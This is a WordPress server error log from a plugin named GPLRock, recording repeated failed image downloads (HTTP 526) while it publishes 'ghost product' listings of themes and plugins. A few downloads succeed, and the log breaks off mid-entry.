[05-Apr-2026 08:51:20 UTC] GPLRock: Image download failed for product golden-hearts-fundraising-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/golden-hearts---fundraising--charity-wordpress-theme-4098.webp for product golden-hearts-fundraising-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:51:22 UTC] GPLRock WARNING: Image download failed for product golden-hearts-fundraising-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/golden-hearts---fundraising--charity-wordpress-theme-4098.webp [05-Apr-2026 08:51:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: golden-hearts-fundraising-charity-wordpress-theme [05-Apr-2026 08:51:23 UTC] GPLRock: Image download failed for product pitstop-auto-parts-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:25 UTC] GPLRock: Image download failed for product pitstop-auto-parts-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pitstop---auto-parts-woocommerce-theme-9482.webp for product pitstop-auto-parts-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:51:27 UTC] GPLRock: Image download failed for product pitstop-auto-parts-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:29 UTC] GPLRock: Image download failed for product pitstop-auto-parts-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pitstop---auto-parts-woocommerce-theme-9482.webp for product pitstop-auto-parts-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:51:31 UTC] GPLRock WARNING: Image download failed for product pitstop-auto-parts-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/pitstop---auto-parts-woocommerce-theme-9482.webp [05-Apr-2026 08:51:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pitstop-auto-parts-woocommerce-theme [05-Apr-2026 08:51:31 UTC] GPLRock: Image download failed for product konstruk-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:33 UTC] GPLRock: Image download failed for product konstruk-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/konstruk---construction-wordpress-theme-18381.webp for product konstruk-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:51:36 UTC] GPLRock: Image download failed for product konstruk-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:38 UTC] GPLRock: Image download failed for product konstruk-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/konstruk---construction-wordpress-theme-18381.webp for product konstruk-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:51:40 UTC] GPLRock WARNING: Image download failed for product konstruk-construction-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/konstruk---construction-wordpress-theme-18381.webp [05-Apr-2026 08:51:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: konstruk-construction-wordpress-theme [05-Apr-2026 08:51:40 UTC] GPLRock: Image download failed for product hotel-booking-wordpress-theme-luviana (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:42 UTC] GPLRock: Image download failed for product hotel-booking-wordpress-theme-luviana (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotel-booking-wordpress-theme---luviana-21571.webp for product hotel-booking-wordpress-theme-luviana after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:51:44 UTC] GPLRock: Image download failed for product hotel-booking-wordpress-theme-luviana (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:46 UTC] GPLRock: Image download failed for product hotel-booking-wordpress-theme-luviana (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotel-booking-wordpress-theme---luviana-21571.webp for product hotel-booking-wordpress-theme-luviana after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:51:48 UTC] GPLRock WARNING: Image download failed for product hotel-booking-wordpress-theme-luviana. URL: https://meldwp.com/wp-content/uploads/hotel-booking-wordpress-theme---luviana-21571.webp [05-Apr-2026 08:51:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hotel-booking-wordpress-theme-luviana [05-Apr-2026 08:51:49 UTC] GPLRock: Image download failed for product lean-one-page-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:51 UTC] GPLRock: Image download failed for product lean-one-page-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lean---one-page-portfolio-wordpress-theme-14482.webp for product lean-one-page-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:51:53 UTC] GPLRock: Image download failed for product lean-one-page-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:55 UTC] GPLRock: Image download failed for product lean-one-page-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lean---one-page-portfolio-wordpress-theme-14482.webp for product lean-one-page-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:51:57 UTC] GPLRock WARNING: Image download failed for product lean-one-page-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lean---one-page-portfolio-wordpress-theme-14482.webp [05-Apr-2026 08:51:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lean-one-page-portfolio-wordpress-theme [05-Apr-2026 08:51:57 UTC] GPLRock: Image download failed for product ecogrow-green-farming-agriculture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:59 UTC] GPLRock: Image download failed for product ecogrow-green-farming-agriculture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecogrow---green-farming--agriculture-wordpress-theme-25193.webp for product ecogrow-green-farming-agriculture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:52:02 UTC] GPLRock: Image download failed for product ecogrow-green-farming-agriculture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:04 UTC] GPLRock: Image download failed for product ecogrow-green-farming-agriculture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecogrow---green-farming--agriculture-wordpress-theme-25193.webp for product ecogrow-green-farming-agriculture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:52:06 UTC] GPLRock WARNING: Image download failed for product ecogrow-green-farming-agriculture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ecogrow---green-farming--agriculture-wordpress-theme-25193.webp [05-Apr-2026 08:52:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ecogrow-green-farming-agriculture-wordpress-theme [05-Apr-2026 08:52:06 UTC] GPLRock: Image download failed for product jinx-pet-shop-veterinary-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:08 UTC] GPLRock: Image download failed for product jinx-pet-shop-veterinary-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jinx---pet-shop--veterinary-woocommerce-theme-24865.webp for product jinx-pet-shop-veterinary-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:52:10 UTC] GPLRock: Image download failed for product jinx-pet-shop-veterinary-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:12 UTC] GPLRock: Image download failed for product jinx-pet-shop-veterinary-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jinx---pet-shop--veterinary-woocommerce-theme-24865.webp for product jinx-pet-shop-veterinary-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:52:14 UTC] GPLRock WARNING: Image download failed for product jinx-pet-shop-veterinary-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/jinx---pet-shop--veterinary-woocommerce-theme-24865.webp [05-Apr-2026 08:52:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jinx-pet-shop-veterinary-woocommerce-theme [05-Apr-2026 08:52:15 UTC] GPLRock: Image download failed for product hendon-single-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:17 UTC] GPLRock: Image download failed for product hendon-single-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hendon---single-property-wordpress-theme-31169.webp for product hendon-single-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:52:19 UTC] GPLRock: Image download failed for product hendon-single-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:21 UTC] GPLRock: Image download failed for product hendon-single-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hendon---single-property-wordpress-theme-31169.webp for product hendon-single-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:52:23 UTC] GPLRock WARNING: Image download failed for product hendon-single-property-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hendon---single-property-wordpress-theme-31169.webp [05-Apr-2026 08:52:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hendon-single-property-wordpress-theme [05-Apr-2026 08:52:23 UTC] GPLRock: Image download failed for product kitchen-design-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:25 UTC] GPLRock: Image download failed for product kitchen-design-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kitchen---design-responsive-wordpress-theme-20109.webp for product kitchen-design-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:52:28 UTC] GPLRock: Image download failed for product kitchen-design-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:30 UTC] GPLRock: Image download failed for product kitchen-design-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kitchen---design-responsive-wordpress-theme-20109.webp for product kitchen-design-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:52:32 UTC] GPLRock WARNING: Image download failed for product kitchen-design-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kitchen---design-responsive-wordpress-theme-20109.webp [05-Apr-2026 08:52:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kitchen-design-responsive-wordpress-theme [05-Apr-2026 08:52:32 UTC] GPLRock: Image download failed for product windowmag-news-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:34 UTC] GPLRock: Image download failed for product windowmag-news-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/windowmag---news--magazine-wordpress-theme-15429.webp for product windowmag-news-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:52:36 UTC] GPLRock: Image download failed for product windowmag-news-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:38 UTC] GPLRock: Image download failed for product windowmag-news-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:52:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/windowmag---news--magazine-wordpress-theme-15429.webp for product windowmag-news-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:52:40 UTC] GPLRock WARNING: Image download failed for product windowmag-news-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/windowmag---news--magazine-wordpress-theme-15429.webp [05-Apr-2026 08:52:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: windowmag-news-magazine-wordpress-theme [05-Apr-2026 08:53:11 UTC] GPLRock: Image download failed for product skynet-multipurpose-business-cms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:13 UTC] GPLRock: Image download failed for product skynet-multipurpose-business-cms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/skynet---multipurpose-business-cms-22203.webp for product skynet-multipurpose-business-cms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:53:15 UTC] GPLRock: Image download failed for product skynet-multipurpose-business-cms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:17 UTC] GPLRock: Image download failed for product skynet-multipurpose-business-cms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/skynet---multipurpose-business-cms-22203.webp for product skynet-multipurpose-business-cms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:53:20 UTC] GPLRock WARNING: Image download failed for product skynet-multipurpose-business-cms. URL: https://meldwp.com/wp-content/uploads/skynet---multipurpose-business-cms-22203.webp [05-Apr-2026 08:53:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: skynet-multipurpose-business-cms [05-Apr-2026 08:53:20 UTC] GPLRock: Image downloaded successfully for product progress-bar-addon-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fa18d967.webp [05-Apr-2026 08:53:20 UTC] GPLRock: Using pre-downloaded image for product progress-bar-addon-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fa18d967.webp [05-Apr-2026 08:53:20 UTC] GPLRock: Ghost product published with image - Product ID: progress-bar-addon-for-elementor [05-Apr-2026 08:53:20 UTC] GPLRock: Image download failed for product osteo-accordion-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:22 UTC] GPLRock: Image download failed for product osteo-accordion-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/osteo-accordion-for-elementor-16466.webp for product osteo-accordion-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:53:24 UTC] GPLRock: Image download failed for product osteo-accordion-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:26 UTC] GPLRock: Image download failed for product osteo-accordion-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/osteo-accordion-for-elementor-16466.webp for product osteo-accordion-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:53:28 UTC] GPLRock WARNING: Image download failed for product osteo-accordion-for-elementor. URL: https://meldwp.com/wp-content/uploads/osteo-accordion-for-elementor-16466.webp [05-Apr-2026 08:53:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: osteo-accordion-for-elementor [05-Apr-2026 08:53:28 UTC] GPLRock: Image download failed for product 8degree-circular-menu-responsive-circular-menu-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:31 UTC] GPLRock: Image download failed for product 8degree-circular-menu-responsive-circular-menu-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/8degree-circular-menu---responsive-circular-menu-plugin-for-wordpress-27596.webp for product 8degree-circular-menu-responsive-circular-menu-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:53:33 UTC] GPLRock: Image download failed for product 8degree-circular-menu-responsive-circular-menu-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:35 UTC] GPLRock: Image download failed for product 8degree-circular-menu-responsive-circular-menu-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/8degree-circular-menu---responsive-circular-menu-plugin-for-wordpress-27596.webp for product 8degree-circular-menu-responsive-circular-menu-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:53:37 UTC] GPLRock WARNING: Image download failed for product 8degree-circular-menu-responsive-circular-menu-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/8degree-circular-menu---responsive-circular-menu-plugin-for-wordpress-27596.webp [05-Apr-2026 08:53:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 8degree-circular-menu-responsive-circular-menu-plugin-for-wordpress [05-Apr-2026 08:53:37 UTC] GPLRock: Image download failed for product qrpay-payment-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:39 UTC] GPLRock: Image download failed for product qrpay-payment-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qrpay-payment-gateway-for-woocommerce-24639.webp for product qrpay-payment-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:53:41 UTC] GPLRock: Image download failed for product qrpay-payment-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:44 UTC] GPLRock: Image download failed for product qrpay-payment-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qrpay-payment-gateway-for-woocommerce-24639.webp for product qrpay-payment-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:53:46 UTC] GPLRock WARNING: Image download failed for product qrpay-payment-gateway-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/qrpay-payment-gateway-for-woocommerce-24639.webp [05-Apr-2026 08:53:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: qrpay-payment-gateway-for-woocommerce [05-Apr-2026 08:53:46 UTC] GPLRock: Image download failed for product horse-racing-html5-casino-game (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:48 UTC] GPLRock: Image download failed for product horse-racing-html5-casino-game (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/horse-racing---html5-casino-game-19747.webp for product horse-racing-html5-casino-game after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:53:50 UTC] GPLRock: Image download failed for product horse-racing-html5-casino-game (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:52 UTC] GPLRock: Image download failed for product horse-racing-html5-casino-game (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/horse-racing---html5-casino-game-19747.webp for product horse-racing-html5-casino-game after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:53:54 UTC] GPLRock WARNING: Image download failed for product horse-racing-html5-casino-game. URL: https://meldwp.com/wp-content/uploads/horse-racing---html5-casino-game-19747.webp [05-Apr-2026 08:53:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: horse-racing-html5-casino-game [05-Apr-2026 08:53:54 UTC] GPLRock: Image download failed for product revy-import-data-import-utility-for-revy-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:57 UTC] GPLRock: Image download failed for product revy-import-data-import-utility-for-revy-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:53:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revy-import---data-import-utility-for-revy-plugin-5490.webp for product revy-import-data-import-utility-for-revy-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:53:59 UTC] GPLRock: Image download failed for product revy-import-data-import-utility-for-revy-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:54:01 UTC] GPLRock: Image download failed for product revy-import-data-import-utility-for-revy-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:54:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revy-import---data-import-utility-for-revy-plugin-5490.webp for product revy-import-data-import-utility-for-revy-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:54:03 UTC] GPLRock WARNING: Image download failed for product revy-import-data-import-utility-for-revy-plugin. URL: https://meldwp.com/wp-content/uploads/revy-import---data-import-utility-for-revy-plugin-5490.webp [05-Apr-2026 08:54:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: revy-import-data-import-utility-for-revy-plugin [05-Apr-2026 08:54:03 UTC] GPLRock: Image download failed for product woocommerce-emi-popup (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:54:05 UTC] GPLRock: Image download failed for product woocommerce-emi-popup (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:54:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-emi-popup-2578.webp for product woocommerce-emi-popup after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:54:07 UTC] GPLRock: Image download failed for product woocommerce-emi-popup (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:54:09 UTC] GPLRock: Image download failed for product woocommerce-emi-popup (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:54:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-emi-popup-2578.webp for product woocommerce-emi-popup after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:54:12 UTC] GPLRock WARNING: Image download failed for product woocommerce-emi-popup. URL: https://meldwp.com/wp-content/uploads/woocommerce-emi-popup-2578.webp [05-Apr-2026 08:54:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-emi-popup [05-Apr-2026 08:54:12 UTC] GPLRock: Image download failed for product woocommerce-b2b (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:54:14 UTC] GPLRock: Image download failed for product woocommerce-b2b (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:54:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-b2b-1146.webp for product woocommerce-b2b after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:54:16 UTC] GPLRock: Image download failed for product woocommerce-b2b (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:54:18 UTC] GPLRock: Image download failed for product woocommerce-b2b (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:54:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-b2b-1146.webp for product woocommerce-b2b after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:54:20 UTC] GPLRock WARNING: Image download failed for product woocommerce-b2b. URL: https://meldwp.com/wp-content/uploads/woocommerce-b2b-1146.webp [05-Apr-2026 08:54:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-b2b [05-Apr-2026 08:54:20 UTC] GPLRock: Image download failed for product webviewgold-for-android-convert-website-to-android-app-no-code-push-url-handling-much-more (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:54:23 UTC] GPLRock: Image download failed for product webviewgold-for-android-convert-website-to-android-app-no-code-push-url-handling-much-more (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:54:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/webviewgold-for-android--convert-website-to-android-app--no-code-push-url-handli-6068.webp for product webviewgold-for-android-convert-website-to-android-app-no-code-push-url-handling-much-more after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:54:25 UTC] GPLRock: Image download failed for product webviewgold-for-android-convert-website-to-android-app-no-code-push-url-handling-much-more (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:54:27 UTC] GPLRock: Image download failed for product webviewgold-for-android-convert-website-to-android-app-no-code-push-url-handling-much-more (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:54:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/webviewgold-for-android--convert-website-to-android-app--no-code-push-url-handli-6068.webp for product webviewgold-for-android-convert-website-to-android-app-no-code-push-url-handling-much-more after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:54:29 UTC] GPLRock WARNING: Image download failed for product webviewgold-for-android-convert-website-to-android-app-no-code-push-url-handling-much-more. URL: https://meldwp.com/wp-content/uploads/webviewgold-for-android--convert-website-to-android-app--no-code-push-url-handli-6068.webp [05-Apr-2026 08:54:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: webviewgold-for-android-convert-website-to-android-app-no-code-push-url-handling-much-more [05-Apr-2026 08:55:20 UTC] GPLRock: Image downloaded successfully for product wpdiscuz-embeds (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ca0d42b.jpg [05-Apr-2026 08:55:20 UTC] GPLRock: Using pre-downloaded image for product wpdiscuz-embeds: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ca0d42b.jpg [05-Apr-2026 08:55:20 UTC] GPLRock: Ghost product published with image - Product ID: wpdiscuz-embeds [05-Apr-2026 08:55:21 UTC] GPLRock: Image downloaded successfully for product graph-paper-press-sell-media-manual-purchases (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5e652435.jpg [05-Apr-2026 08:55:21 UTC] GPLRock: Using pre-downloaded image for product graph-paper-press-sell-media-manual-purchases: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5e652435.jpg [05-Apr-2026 08:55:21 UTC] GPLRock: Ghost product published with image - Product ID: graph-paper-press-sell-media-manual-purchases [05-Apr-2026 08:55:23 UTC] GPLRock: Image downloaded successfully for product florence-a-responsive-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-29db8144.jpg [05-Apr-2026 08:55:23 UTC] GPLRock: Using pre-downloaded image for product florence-a-responsive-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-29db8144.jpg [05-Apr-2026 08:55:23 UTC] GPLRock: Ghost product published with image - Product ID: florence-a-responsive-wordpress-blog-theme [05-Apr-2026 08:55:25 UTC] GPLRock: Image downloaded successfully for product travel-wordpress-theme-goexplore (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8af08497.jpg [05-Apr-2026 08:55:25 UTC] GPLRock: Using pre-downloaded image for product travel-wordpress-theme-goexplore: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8af08497.jpg [05-Apr-2026 08:55:25 UTC] GPLRock: Ghost product published with image - Product ID: travel-wordpress-theme-goexplore [05-Apr-2026 08:55:26 UTC] GPLRock: Image downloaded successfully for product woocommerce-aramex (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3cb34bda.jpg [05-Apr-2026 08:55:26 UTC] GPLRock: Using pre-downloaded image for product woocommerce-aramex: 